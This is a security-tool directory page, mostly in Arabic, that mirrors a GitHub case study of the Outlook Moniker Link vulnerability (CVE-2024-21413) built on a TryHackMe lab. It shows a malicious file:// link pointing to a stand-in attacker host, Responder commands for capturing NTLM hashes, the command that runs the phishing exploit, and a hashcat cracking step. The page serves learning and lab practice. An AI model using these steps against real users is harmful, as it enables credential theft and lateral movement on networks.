Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةالتصيد الاحتياليCTFالتعلم والتعليمأمان البريد الإلكترونيمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

دراسة حالة لـ CVE-2024-21413. تم استخدام غرفة TryHackMe Moniker Link (CVE-2024-21413) كمرجع. تم إجراء تعديلات على الاستغلال (exploit) باستخدام claude code.

عرض المستودع
23منذ 5 أشهرلم تتم المراجعة بعد

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + تسريب بيانات اعتماد NTLM

⚠️ إخلاء مسؤولية: هذا المستودع مخصص حصريًا للأغراض التعليمية والبحث الأمني. تم تنفيذ جميع العروض التوضيحية في بيئات خاضعة للتحكم ومعزولة. استخدام هذه التقنيات ضد أنظمة دون إذن صريح هو غير قانوني وغير أخلاقي.


📋 الفهرس

  • نظرة عامة
  • كيف تعمل الثغرة
  • بيئة المختبر
  • العرض التوضيحي خطوة بخطوة
  • سكربت الاستغلال
  • مخطط الهجوم
  • التخفيف والدفاع
  • تحليل CVE
  • المراجع

🔍 نظرة عامة

الحقلالتفاصيل
CVECVE-2024-21413
الإفصاح13 فبراير 2024 (ثلاثاء التصحيحات)
درجة CVSS9.8 (حرجة)
المنتجMicrosoft Outlook
النوعRCE + تسريب بيانات الاعتماد (NTLM Hash)
الناقلالشبكة / البريد الإلكتروني (بدون مصادقة مسبقة)
التفاعليتطلب تفاعل المستخدم (النقر على الرابط)
الاسم المستعارMoniker Link

CVE-2024-21413 هي ثغرة أمنية حرجة في Microsoft Outlook تسمح للمهاجم بـ:

  1. تسريب بيانات اعتماد NTLM الخاصة بالضحية من خلال إجبار مصادقة SMB تلقائية
  2. تنفيذ كود عن بُعد على الجهاز المستهدف عبر رابط خبيث في البريد الإلكتروني

يأتي اسم "Moniker Link" من استغلال كائنات COM (Component Object Model) Monikers — وهي آلية في Windows للإشارة إلى كائنات عبر سلسلة نصية — لتجاوز حمايات Outlook ضد روابط file://.


🧠 كيف تعمل الثغرة

المشكلة: تجاوز Protected View

عادةً، يحظر Outlook روابط file:// التي تشير إلى موارد الشبكة، ويعرض تحذيرًا أمنيًا (Protected View). تكمن الثغرة في الطريقة التي يعالج بها Outlook عناوين URL التي تحتوي على الحرف ! — وهو فاصل Moniker.

الاستغلال

رابط خبيث بالصيغة:

file:///\\ATTACKER_IP\share\!something

يؤدي الحرف ! إلى جعل محلل Outlook يفسّر عنوان URL كمرجع إلى COM Moniker، متجاهلاً فحوصات الأمان المعتادة. النتيجة:

  • يحاول جهاز الضحية المصادقة تلقائيًا عبر SMB على خادم المهاجم
  • أثناء هذه المصادقة، يتم إرسال هاش NTLM الخاص بالضحية
  • يمكن استخدام هذا الهاش في هجمات Pass-the-Hash أو كسره دون اتصال

التدفق المبسط

Atacante envia e-mail → Vítima clica no link → Outlook processa URL com "!"
→ Bypass da Protected View → Conexão SMB automática → Hash NTLM capturado

🖥️ بيئة المختبر

لإعادة إنتاج هذه الحالة الدراسية بأمان:

الجهازنظام التشغيلالدور
المهاجمKali Linuxمستمع SMB + استغلال
الهدفWindows 10/11 مع Outlook ضعيفالضحية

مهم: استخدم شبكة معزولة (NAT أو Host-Only في VirtualBox/VMware). لا تنفّذ أبدًا على شبكات حقيقية.

الأدوات المطلوبة

# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder

# Python 3 — para rodar o exploit
python3 --version

# Verificar conectividade entre as máquinas
ping <IP_ALVO>

🚀 العرض التوضيحي خطوة بخطوة

الخطوة 1 — تحديد عنوان IP لجهاز المهاجم

ip a | grep inet
# Anote o IP da interface que se comunica com o alvo (ex: 192.168.56.10)

الخطوة 2 — تشغيل Responder

يقوم Responder بإنشاء خادم SMB وهمي يلتقط هاشات مصادقة NTLM.

sudo responder -I eth0 -v
# Substitua eth0 pela sua interface de rede

الإخراج المتوقع:

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash     : usuario::DESKTOP-ALVO:...

الخطوة 3 — تشغيل الاستغلال

python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVIDOR_EMAIL> \
  --attacker-ip 192.168.56.10

الخطوة 4 — انتظار الضحية للنقر على الرابط

عندما تفتح الضحية البريد الإلكتروني وتنقر على الرابط، يلتقط Responder تلقائيًا هاش NTLM. يمكن استخدام هذا الهاش من أجل:

  • التحليل لتحديد الحساب المخترق
  • استخدامه في Pass-the-Hash للمصادقة الجانبية على الشبكة
  • إرساله إلى Hashcat/John لمحاولة الكسر دون اتصال:
hashcat -m 5600 hash.txt wordlist.txt

🐍 سكربت الاستغلال

انظر الملف exploit.py للحصول على السكربت الكامل والمُعلق.


📊 مخطط الهجوم

انظر الملف diagrama-ataque.html للحصول على تصور تفاعلي للتدفق الكامل للهجوم.


🛡️ التخفيف والدفاع

انظر الملف MITIGACAO.md للحصول على الدليل الكامل للتخفيف والدفاع.


📄 تحليل CVE

انظر الملف CVE-BREAKDOWN.md للحصول على التحليل الفني التفصيلي للثغرة.


📚 المراجع

  • التنبيه الأمني من Microsoft — CVE-2024-21413
  • بحث Morphisec — Moniker Link
  • غرفة TryHackMe — Moniker Link
  • أداة Responder — GitHub
  • توثيق NTLM — وثائق Microsoft
  • NVD — CVE-2024-21413

👤 المؤلف

دراسة حالة تم تطويرها كجزء من تدريب عملي في الأمن الهجومي عبر TryHackMe.

يتبع هذا المشروع مبادئ الإفصاح المسؤول والاختراق الأخلاقي. يهدف كل المحتوى الموجود هنا إلى التعليم وتحسين الوضع الأمني.

تنزيل الأداة